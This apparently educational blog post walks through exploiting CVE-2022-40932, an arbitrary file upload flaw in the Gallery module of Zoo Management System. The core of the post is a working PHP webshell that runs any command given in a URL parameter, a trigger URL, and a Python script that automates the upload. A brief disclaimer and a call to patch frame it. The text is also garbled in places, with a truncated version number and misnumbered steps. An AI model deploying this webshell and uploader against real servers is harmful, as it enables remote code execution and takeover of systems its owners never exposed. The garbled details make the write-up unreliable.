CVE-2022-40932 - How Hackers Can Exploit Zoo Management System v1. with Arbitrary File Upload

Disclaimer: The following article is for educational purposes only. Do not use this information for unauthorized hacking. Always have permission before testing systems.

What is CVE-2022-40932?

CVE-2022-40932 is a vulnerability found in the Zoo Management System v1.. This bug lets attackers upload any file they want—including malicious files—to the server through the admin panel’s Gallery module.

Where's the Vulnerability?

The problem is inside the gallery file upload function of the Gallery module in the system’s admin panel. This area is supposed to let managers upload images of animals, events, or zoo scenes. But the system does not properly check what kind of file is being uploaded.

In other words:  
You can upload not just images (.jpg, .png) but also PHP scripts or other code files if you bypass the basic checks.

Here’s a simple breakdown

1. The attacker logs in as an admin (sometimes these panels have weak or default passwords, or attacker gets access some other way).

They go to the Gallery’s "Add Picture" page.

3. Instead of uploading a normal image, the attacker chooses a file like evil.php containing malicious PHP code.

Create a file named cmd.php with the following basic webshell code

<?php
if(isset($_GET['cmd'])){
    system($_GET['cmd']);
}
?>

This tiny script lets anyone run system commands from the browser by adding ?cmd=YOUR_COMMAND after the URL.

Choose your cmd.php file to upload.

- Submit/upload the file.

If the vulnerability is present, the upload will succeed, and cmd.php will be saved on the web server.

3. Trigger the Webshell

Visit the uploaded file in your browser. For example:  

http://target-site.com/path-to-gallery/cmd.php?cmd=whoami

You will see the output of the command (whoami returns the server username). You can try other commands as well.

You can automate the file upload using Python and the requests library

import requests

url = "http://target-site.com/path-to-gallery/upload.php";
file_path = "cmd.php"

files = {'file': open(file_path, 'rb')}
data = {
    'other_required_fields': 'value'  # Add other form fields if needed
}

r = requests.post(url, files=files, data=data)

if r.status_code == 200:
    print("File uploaded successfully!")
else:
    print("Upload failed.")

Links and References

- NVD Entry for CVE-2022-40932
- Exploit-DB Reference #50947
- Zoo Management System v1. Demo
- OWASP File Upload Risks

Conclusion

CVE-2022-40932 is a classic example of why file upload functionality needs to be handled carefully. If you run Zoo Management System v1., patch or secure your install ASAP. Hackers can use this flaw to take full control of your server—don’t let your zoo become their playground!

Timeline

Published on: 09/22/2022 16:15:00 UTC
Last modified on: 09/23/2022 19:08:00 UTC